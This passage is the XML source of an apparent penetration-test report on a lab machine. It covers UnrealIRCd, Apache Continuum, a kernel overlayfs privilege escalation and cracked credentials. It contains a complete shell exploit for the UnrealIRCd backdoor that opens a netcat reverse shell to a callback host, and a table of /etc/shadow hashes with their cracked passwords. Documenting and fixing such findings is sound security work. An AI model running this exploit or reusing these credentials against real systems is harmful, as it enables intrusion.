        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D562EA1" w14:textId="6F68906A" w:rsidR="006C554E" w:rsidRDefault="004F362C" w:rsidP="0052608E">
      <w:r>
        <w:t xml:space="preserve">Update </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UnrealIRCd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to the latest version available.</w:t>
      </w:r>
      <w:r w:rsidR="00940CC6">
        <w:t xml:space="preserve"> Change the user running the server to a dedicated user specifically for that server and nothing else.</w:t>
      </w:r>
      <w:r w:rsidR="006C554E">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F5A05C" w14:textId="63F95E80" w:rsidR="00C66923" w:rsidRDefault="006C554E" w:rsidP="0052608E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B6F79" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76104DBE" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A837B97" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t># CVE-2010-2075</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51293C93" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t># Unreal IRC 3.2 Backdoor arbitrary command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3605C2BF" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t># https://www.exploit-db.com/exploits/13853</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160CF015" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09630F2D" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t># Author: Mason Soroka-Gill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3849F801" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BC2338" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> version adapted to spawn a reverse shell on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349FE18D" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749CBFA0" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t># Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C70626C" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#   This relies on the remote host having </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the system if this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>doesn't</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3E7CA878" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#   work, replace </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with telnet in the echo string or use another reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F57D843" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781065EB" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2822D192" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">if [ $# -ne </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>4 ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACEA8C7" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    echo "Usage:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452DB2DC" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    echo "$0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>callback_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>callback_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0533703A" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    echo "Example:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21650D6E" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    echo "$0 10.25.100.24 6667 10.25.100.23 7000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC0FCD1" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    exit 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AFBF2F" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B463F13" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10EE7CF1" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=$1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283BF681" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=$2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6C7B3F" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=$3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC0E533" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=$4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462589AD" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291F9BDF" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t>(echo "AB; rm /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>bd;mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bd;cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bd|/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh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2&gt;&amp;1|nc $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/bd" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAB94AD" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1088806C" w14:textId="77777777" w:rsidR="005C20DD" w:rsidRDefault="007B5973" w:rsidP="005C20DD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Port_8080"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="30" w:name="_Toc49875738"/>
      <w:r w:rsidR="005C20DD">
        <w:lastRenderedPageBreak/>
        <w:t>Port 8080</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="70AB3EAC" w14:textId="07E0D276" w:rsidR="00137370" w:rsidRDefault="000010C0" w:rsidP="000010C0">
      <w:r>
        <w:t>Apache continuum is vulnerable to Apache Continuum Arbitrary Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F69FE7" w14:textId="24F32607" w:rsidR="00CC0D04" w:rsidRDefault="00CC0D04" w:rsidP="000010C0">
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00CC0D04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Metasploit module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> is available for this exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F069F1B" w14:textId="2923767D" w:rsidR="00CC0D04" w:rsidRDefault="00CC0D04" w:rsidP="000010C0">
      <w:r>
        <w:t>Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5085708D" w14:textId="4F8B660F" w:rsidR="00CC0D04" w:rsidRDefault="00CC0D04" w:rsidP="000010C0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31D7348D" wp14:editId="527B2A1E">
            <wp:extent cx="5995775" cy="4394200"/>
            <wp:effectExtent l="0" t="0" r="5080" b="6350"/>
            <wp:docPr id="6" name="Picture 6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ell phone&#10;&#10;Description automatically generated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095" cy="4397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9D461" w14:textId="7B8DD11D" w:rsidR="000010C0" w:rsidRDefault="00CC0D04" w:rsidP="000010C0">
      <w:r>
        <w:t>Note: Meterpreter session 1 and 2 were both spawned from this exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2A9970" w14:textId="77777777" w:rsidR="00A5510B" w:rsidRDefault="00A5510B">
      <w:r>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1E5707" w14:textId="14160217" w:rsidR="00784070" w:rsidRDefault="00A5510B">
      <w:r>
        <w:t>Update apache continuum to the latest version.</w:t>
      </w:r>
      <w:r w:rsidR="00784070">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9F8BBD" w14:textId="624C6E61" w:rsidR="00784070" w:rsidRDefault="00784070" w:rsidP="00784070">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc49875739"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kernel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="4CB1FFD5" w14:textId="16D9AF65" w:rsidR="00784070" w:rsidRDefault="00784070" w:rsidP="00784070">
      <w:r w:rsidRPr="00784070">
        <w:t xml:space="preserve">Kernel version 3.13.0.32-generic is vulnerable to </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00784070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE-2015-1328 "</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00784070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>overlayfs</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00784070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>" local privilege escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382A66EC" w14:textId="5AC26F65" w:rsidR="00784070" w:rsidRDefault="00784070" w:rsidP="00784070">
      <w:r>
        <w:t xml:space="preserve">There is a </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00784070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Metasploit module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> for this exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70384E5E" w14:textId="73DC1A5B" w:rsidR="00784070" w:rsidRDefault="00784070" w:rsidP="00784070">
      <w:r>
        <w:t>Unfortunately, this exploit was unable to be executed via Metasploit for some reason.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD8EF07" w14:textId="26D27C3A" w:rsidR="00784070" w:rsidRDefault="00784070" w:rsidP="00784070">
      <w:r>
        <w:t>Manual exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F49376" w14:textId="488D650A" w:rsidR="00784070" w:rsidRDefault="00A0099F" w:rsidP="00784070">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7369FF61" wp14:editId="5BCFF5F0">
            <wp:extent cx="5731510" cy="3798570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7" name="Picture 7" descr="A picture containing sitting, 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picture containing sitting, table&#10;&#10;Description automatically generated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718C1" w14:textId="6020EF15" w:rsidR="00A0099F" w:rsidRDefault="00A0099F">
      <w:r>
        <w:t xml:space="preserve">Source code of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ofs.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00A0099F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BB0F5D" w14:textId="77777777" w:rsidR="00391B6A" w:rsidRDefault="00391B6A">
      <w:r>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FF1C12" w14:textId="06D1232E" w:rsidR="000010C0" w:rsidRDefault="00391B6A">
      <w:r>
        <w:t>Update Ubuntu and/or update to a newer kernel release.</w:t>
      </w:r>
      <w:r w:rsidR="000010C0">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA53F2A" w14:textId="04CEADBA" w:rsidR="00116A84" w:rsidRDefault="007F35EF" w:rsidP="007F35EF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc49875740"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="701E62D5" w14:textId="249A8022" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc49875741"/>
      <w:r>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="3A0C4366" w14:textId="2BA7044B" w:rsidR="007A5172" w:rsidRPr="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hashing algorithm: MD5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70"/>
        <w:gridCol w:w="3963"/>
        <w:gridCol w:w="2432"/>
      </w:tblGrid>
      <w:tr w:rsidR="002578BE" w14:paraId="25F68B21" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="348"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5678FD01" w14:textId="7ABF3411" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="007F35EF">
            <w:r>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A8EEFB8" w14:textId="10D434A9" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="007F35EF">
            <w:r>
              <w:t>Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="588F564F" w14:textId="319C66E0" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="007F35EF">
            <w:r>
              <w:t>Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002578BE" w14:paraId="14F6FA7A" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E443924" w14:textId="49DF29DE" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r>
              <w:t>storm_trooper_1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A511736" w14:textId="2A0DA5AC" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r>
              <w:t>$1$lnwk829Q$HmlEMwzAUCz0NEitMjx9d1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33F43348" w14:textId="6F2DE687" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B312AE">
              <w:t>starwarsrocks</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002578BE" w14:paraId="737F97D7" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="232"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61F3DDC1" w14:textId="7CD6576E" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007F35EF">
              <w:t>storm_trooper_2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="638F213C" w14:textId="0F4B0976" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007F35EF">
              <w:t>$1$9AJdbBeI$7a/Tj3TjRzZYR6mhbZksq0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04FAD8C3" w14:textId="4EF1BDA1" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00B312AE">
              <w:t>stormtrooper1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002578BE" w14:paraId="3C042EF7" w14:textId="77777777" w:rsidTr="002578BE">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00F0F5F1" w14:textId="04FF51F1" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007F35EF">
              <w:t>storm_trooper_3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3717C225" w14:textId="064D35B6" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007F35EF">
              <w:t>$1$WdB.ds.7$N7hkGMUGsyeBgNPwIaF/40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2432" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="257FC3A3" w14:textId="2B04BB9B" w:rsidR="002578BE" w:rsidRDefault="002578BE" w:rsidP="002578BE">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00B312AE">
